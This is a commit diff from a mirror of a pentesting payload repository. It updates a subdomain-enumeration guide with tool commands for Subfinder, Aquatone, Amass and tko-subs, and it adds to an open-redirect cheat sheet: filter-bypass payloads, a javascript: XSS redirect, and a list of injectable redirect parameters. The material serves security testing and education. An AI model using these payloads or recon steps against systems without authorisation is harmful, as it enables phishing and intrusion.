daffainfo
/
PayloadsAllTheThings
mirror of https://github.com/daffainfo/PayloadsAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Subdomain enumeration - New Aquatone (Go)

patch-1
Swissky 2018-11-05 13:45:52 +01:00
parent 6bcb43e39c
commit 1b2ee3e67a
2 changed files with 78 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

60
Methodology and Resources/Subdomains Enumeration.md
View File

@ -8,11 +8,12 @@
* GoogleDorks * GoogleDorks
* EyeWitness * EyeWitness
* Sublist3r * Sublist3r
* Aquatone
* Subfinder * Subfinder
* Aquatone (Ruby and Go versions)
* AltDNS * AltDNS
* MassDNS * MassDNS
* Subdomain take over * Subdomain take over
* tko-subs
* HostileSubBruteForcer * HostileSubBruteForcer
* SubOver * SubOver
@ -33,6 +34,17 @@ git clone https://github.com/danielmiessler/SecLists.git
knockpy domain.com -w subdomains-top1mil-110000.txt knockpy domain.com -w subdomains-top1mil-110000.txt
``` ```
Using EyeWitness and Nmap scans from the KnockPy and enumall scans
```bash
git clone https://github.com/ChrisTruncer/EyeWitness.git
./setup/setup.sh
./EyeWitness.py -f filename -t optionaltimeout --open (Optional)
./EyeWitness -f urls.txt --web
./EyeWitness -x urls.xml -t 8 --headless
./EyeWitness -f rdp.txt --rdp
```
### Using Google Dorks and Google Transparency Report ### Using Google Dorks and Google Transparency Report
You need to include subdomains ;) You need to include subdomains ;)
@ -47,17 +59,6 @@ site:domain.com ext:php,asp,aspx,jsp,jspa,txt,swf
site:*.*.domain.com site:*.*.domain.com
``` ```
### EyeWitness and Nmap scans from the KnockPy and enumall scans
```bash
git clone https://github.com/ChrisTruncer/EyeWitness.git
./setup/setup.sh
./EyeWitness.py -f filename -t optionaltimeout --open (Optional)
./EyeWitness -f urls.txt --web
./EyeWitness -x urls.xml -t 8 --headless
./EyeWitness -f rdp.txt --rdp
```
### Using Sublist3r ### Using Sublist3r
```bash ```bash
@ -73,7 +74,18 @@ python sublist3r.py -e google,yahoo,virustotal -d example.com
python sublist3r.py -b -d example.com python sublist3r.py -b -d example.com
``` ```
### Using Aquatone ### Using Subfinder
```powershell
go get github.com/subfinder/subfinder
./Subfinder/subfinder --set-config PassivetotalUsername='USERNAME',PassivetotalKey='KEY'
./Subfinder/subfinder --set-config RiddlerEmail="EMAIL",RiddlerPassword="PASSWORD"
./Subfinder/subfinder --set-config CensysUsername="USERNAME",CensysSecret="SECRET"
./Subfinder/subfinder --set-config SecurityTrailsKey='KEY'
./Subfinder/subfinder -d example.com -o /tmp/results_subfinder.txt
```
### Using Aquatone - old version (Ruby)
```powershell ```powershell
gem install aquatone gem install aquatone
@ -102,15 +114,16 @@ docker pull txt3rob/aquatone-docker
docker run -it txt3rob/aquatone-docker aq example.com docker run -it txt3rob/aquatone-docker aq example.com
``` ```
### Using Subfinder ### Using Aquatone - new version (Go)
```powershell ```powershell
go get github.com/subfinder/subfinder # Subfinder version
./Subfinder/subfinder --set-config PassivetotalUsername='USERNAME',PassivetotalKey='KEY' ./Subfinder/subfinder -d $1 -r 8.8.8.8,1.1.1.1 -nW -o /tmp/subresult$1
./Subfinder/subfinder --set-config RiddlerEmail="EMAIL",RiddlerPassword="PASSWORD" cat /tmp/subresult$1 | ./Aquatone/aquatone -ports large -out /tmp/aquatone$1
./Subfinder/subfinder --set-config CensysUsername="USERNAME",CensysSecret="SECRET"
./Subfinder/subfinder --set-config SecurityTrailsKey='KEY' # Amass version
./Subfinder/subfinder -d example.com -o /tmp/results_subfinder.txt ./Amass/amass -active -brute -o /tmp/hosts.txt -d $1
cat /tmp/hosts.txt | ./Aquatone/aquatone -ports large -out /tmp/aquatone$1
``` ```
### Using AltDNS ### Using AltDNS
@ -135,6 +148,13 @@ cat /tmp/results_subfinder.txt | massdns -r $DNS_RESOLVERS -t A -o S -w /tmp/res
Check [Can I take over xyz](https://github.com/EdOverflow/can-i-take-over-xyz) by EdOverflow for a list of services and how to claim (sub)domains with dangling DNS records. Check [Can I take over xyz](https://github.com/EdOverflow/can-i-take-over-xyz) by EdOverflow for a list of services and how to claim (sub)domains with dangling DNS records.
### Using tko-subs
```powershell
go get github.com/anshumanbh/tko-subs
./bin/tko-subs -domains=./lists/domains_tkos.txt -data=./lists/providers-data.csv
```
### Using HostileSubBruteForcer ### Using HostileSubBruteForcer
```bash ```bash

39
Open redirect/README.md
View File

@ -1,6 +1,6 @@
# Open URL Redirection # Open URL Redirection
Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the applications access control check and then forward the attacker to privileged functions that they would normally not be able to access. > Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the applications access control check and then forward the attacker to privileged functions that they would normally not be able to access.
## Fuzzing ## Fuzzing
@ -57,6 +57,12 @@ Using null byte "%00" to bypass blacklist filter
//google%00.com //google%00.com
``` ```
Using parameter pollution
```powershell
?next=whitelisted.com&next=google.com
```
Using "@" character, browser will redirect to anything after the "@" Using "@" character, browser will redirect to anything after the "@"
```powershell ```powershell
@ -88,8 +94,39 @@ XSS from javascript:// wrapper
http://www.example.com/redirect.php?url=javascript:prompt(1) http://www.example.com/redirect.php?url=javascript:prompt(1)
``` ```
## Common injection parameters
```powershell
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
```
## Thanks to ## Thanks to
* filedescriptor * filedescriptor
* [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet) * [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
* [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads) * [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
* [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)